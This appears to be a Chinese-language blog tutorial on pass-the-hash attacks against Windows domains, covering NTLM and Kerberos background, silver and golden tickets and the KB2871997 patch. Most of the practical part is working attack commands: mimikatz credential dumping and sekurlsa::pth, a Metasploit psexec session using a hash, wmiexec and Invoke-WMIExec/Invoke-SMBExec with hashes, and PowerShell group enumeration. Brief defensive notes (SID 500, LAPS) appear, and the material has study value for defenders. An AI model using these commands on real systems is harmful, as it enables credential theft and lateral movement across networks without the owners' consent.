总结下PtH具体形式(wmicexec、powershell、msf等)

0x01 PtH攻击原理 && 黄金白银票据

PtH攻击原理

wiki  https://en.wikipedia.org/wiki/Pass_the_hash 写的也很清楚 

 

其中重要的是windows使用系统API(LsaLogonUser)生成hash进行认证,而不是用明文,所以利用hash即可模拟用户登录进行操作。还有的是如果密码长度大于15就不存在LM Hash,从windows2008开始微软默认禁用LM hash。

这也就很好理解pth的原理了。

 

Windows Server 2008启用LM hash的方法:

gpedit.msc-计算机配置-Windows 设置-安全设置-本地策略-安全选项

找到网络安全︰ 不要在下次更改密码存储 LAN 管理器的哈希值,选择已禁用

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

系统下一次更改密码后,就能够导出LM hash

接下里回顾下kerberos认证过程 ,区别白银票据和黄金票据区别。

 域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

 kerberos认证粗略流程:

  1. client向kerberos服务请求,希望获取访问server的权限。 kerberos得到了这个消息,首先得判断client是否是可信赖的, 也就是白名单黑名单的说法。这就是AS服务完成的工作,通过 在AD中存储黑名单和白名单来区分client。认证成功后,KDC此时生成一个随机字符串,叫Session Key,使用用户名对应的NTLM Hash加密Session Key,作为AS数据,使用KDC中某个用户(krbtgt)的NTLM Hash加密Session Key和客户端的信息,生成TGT。      
  2. client得到了TGT后,继续向kerberos请求,希望获取访问 server的权限。客户端需要提供TGT与第一步中AS数据使用自己NTLM Hash解密出来的Session Key加密的客户端信息跟时间戳。kerberos又得到了这个消息,这时候通过client 消息中的TGT,判断出了client拥有了这个权限。验证通过后,就会生成一个新的Session Key,我们称之为Server Session Key,这个Server Session Key主要用于和服务器(不是KDC)进行通信。同时还会生成一个Ticket,也就是最后的票据了。给了client访 问server的权限ticket(ST,也就是server hash,包含请求客户端的主机名和客户端信息加上server session key还有票据失效时间)
  3. client得到ticket后,终于可以成功访问server。client会用Ticket,Server Session Key加密的客户端信息与时间戳去请求server。这个ticket只是 针对这个server,其他server需要向TGS申请。

白银票据(Silver Tickets)

白银票据特点:

  • 1.不需要与KDC进行交互

  • 2.需要目标服务的NTLM Hash

在第三步认证中的Ticket的组成:

Ticket=Server Hash(Server Session Key+Client info+End Time)

当拥有Server Hash时,我们就可以伪造一个不经过KDC认证的一个Ticket

大多数服务不验证PAC(通过将PAC校验和发送到域控制器进行PAC验证)

这里暂且不谈pac的伪造。

黄金票据(Golden Tickets)

黄金票据特点:

  • 1.需要与DC通信

  • 2.需要krbtgt用户的hash

这里的krbtgt hash就是之前讲的KDC Hash

Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的  。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。

0x02 PtH 攻击实现多种方法

首先先来看看历史上微软对pass the hash攻击出的文档:

http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating%20Pass-the-Hash%20(PtH)%20Attacks%20and%20Other%20Credential%20Theft%20Techniques_English.pdf

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

而我们需要关注的就是对于这种攻击微软的经典补丁:

kb2871997,禁止本地管理员账户用于远程连接,这样就无法以本地管理员用户的权限执行wmi、PSEXEC、schtasks、at和访问文件共享。

这个补丁发布后常规的Pass The Hash已经无法成功,唯独默认的 Administrator (SID 500)账号例外,利用这个账号仍可以进行Pass The Hash远程连接。

并且值得注意的是即使administrator改名,它的SID仍然是500,这种攻击方法依然有效。所以对于防御来说,即使打了补丁也要记得禁用SID=500的管理员账户

相关链接如下:
http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html

现在也有手法对应pth,例如LAPS

1)首先是mimikatz2.0

pass the key:

privilege::debug

sekurlsa::logonpasswords

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

弹出cmd 这时候时候net use也可以了

net use \\192.168.5.3\c$

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

mimikatz资料中重点:

ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ; AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.

ntlm散列在XP/2003/Vista/2008和7/2008r2/8/2012 安装补丁kb2871997前是强制性的;AES密钥只能用在8.1/2012r2安装了kb2871997补丁的7/2008r2/8/2012上替换,在这种情况下可以避免ntlm散列。

mimikatz的pth功能需要本地管理员权限,这是由它的实现机制决定的,需要先获得高权限进程lsass.exe的信息

这里拿windows r2原版 安装kb2871997来实验。

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

使用mimikatz先获取hash:

mimikatz "privilege::debug" "sekurlsa::ekeys"

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

注意这里mimikatz是复制不了的

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

解决方法是使用日志记录功能将回显内容输出到文件中,开启日志记录功能后会把输出回显的内容保存在同级目录下的mimikatz.log中,命令参考如下:

mimikatz log privilege::debug sekurlsa::ekeys

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

       aes256_hmac       00842449e386b266f1bb945888de5696a913c3630f51997b2cd1395f3c6d99bf
aes128_hmac 4bd64fecaa1438851981d52e574f27c2
rc4_hmac_nt dfe6e4a03f78f6b4ce617ed0ed1e5e53
rc4_hmac_old dfe6e4a03f78f6b4ce617ed0ed1e5e53
rc4_md4 dfe6e4a03f78f6b4ce617ed0ed1e5e53
rc4_hmac_nt_exp dfe6e4a03f78f6b4ce617ed0ed1e5e53
rc4_hmac_old_exp dfe6e4a03f78f6b4ce617ed0ed1e5e53

 使用aes key  pass the key

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

成功

 注意这里是主机名 不是ip。

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

2)meterpreter

使用经典模块:

use exploit/windows/smb/psexec_psh

或者kali里集成的工具集 很多

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

这个模块可以利用有效的管理员用户名和密码(或密码哈希)来执行一个任意Payload,这个模块跟SysInternals提供的“psexec”实用工具非常类似,而且该模块现在还可以在攻击完成之后自动清理痕迹。这款工具所创建的服务使用的是随机选择的用户名及相关描述。

msf5 > use exploit/windows/smb/smb_
use exploit/windows/smb/smb_delivery use exploit/windows/smb/smb_relay
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.5.3
rhosts => 192.168.5.3
msf5 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf5 exploit(windows/smb/psexec) > set SMBPass 31d6cfe0d16ae931b73c59d7e0c089c0
SMBPass => 31d6cfe0d16ae931b73c59d7e0c089c0
msf5 exploit(windows/smb/psexec) > show options

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

同样的你可以用psexec 都是ok 的。

使用PSExec前提:SMB服务必须开启以及可达。文件和打印机共享必须开启,禁止简单文件共享。 
Admin$必须可以访问。PSExec使用的口令必须可以访问Admin$共享。 
在PSExec可执行文件中含有一个Windows服务。它利用该服务并且在远端机器上部署Admin$。然后通过SMB使用DCE/RPC接口来访问Windows Service Control Manager API。然后在远程主机中开启PSExec访问。然后PSExec服务创建一个命名管道,用它来发送命令。

3)wmiexec:

windows 管理规范[WMI]”,实际上就是windows从03/xp开始就一直内置的一个系统插件,其设计初衷之
一是为了管理员能更加方便的对远程windows主机进行各种日常管理,它意味着我们可以直接在本地操作远程目标机器上的进程,服
务,注册表等其它的一系列的特权操作,严格来说它其实是为各种服务提供一个统一的调用接口而设计的。

python exe

https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

exe版本下载地址:

https://github.com/maaaaz/impacket-examples-windows

注:

wmiexec.py的注释中提示”Main advantage here is it runs under the user (has to be Admin) account”,经实际测试普通用户权限即可

这里拿window2003标准版演示

wmiexec.exe -hashes 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 QING-31E5FF29B3/[email protected] "dir"

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

powershell

https://github.com/Kevin-Robertson/Invoke-TheHash/

使用Invoke-WMIExec:

官方用法:

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

Invoke-WMIExec -Target 192.168.5.9 -Domain QING-31E5FF29B3 -Username Administrator -Hash 32ed87bdb5fdc5e9cba88547376818d4 -Command "calc.exe" -verbose

另外还有Invoke-SMB等脚本都可以进行利用,利用方法也差不多一样:

Invoke-SMBExec

支持SMB1, SMB2 (2.1), and SMB signing

Invoke-SMBExec -Target 192.168.3.21 -Domain QING-31E5FF29B3
-Username Administrator -Hash 32ed87bdb5fdc5e9cba88547376818d4 -Command "calc.exe" -verbose

通过在目标主机创建服务执行命令,所以权限为system

Invoke-SMBClient

支持SMB1, SMB2 (2.1), and SMB signing,如果只有SMB文件共享的权限,没有远程执行权限,可以使用该脚本。

支持的功能包括列举目录、上传文件、下载文件、删除文件(具体权限取决于该口令hash的权限)

拥有票据后继续信息收集即可 如果有powershell,

powershell执行

查看Administrators组

$members = @($([ADSI]”WinNT://WIN-6I39VTOHS15/Administrators”).psbase.Invoke(“Members”))
   $members | foreach { $_.GetType().InvokeMember(“ADspath”, ‘GetProperty’, $null, $_, $null) }

域渗透-凭据传递攻击(pass the hash)完全总结-LMLPHP

查看Domain Users组

$members = @($([ADSI]”WinNT://domian/Domain Users”).psbase.Invoke(“Members”))
$members | foreach { $_.GetType().InvokeMember(“ADspath”, ‘GetProperty’, $null, $_, $null) }
05-11 13:28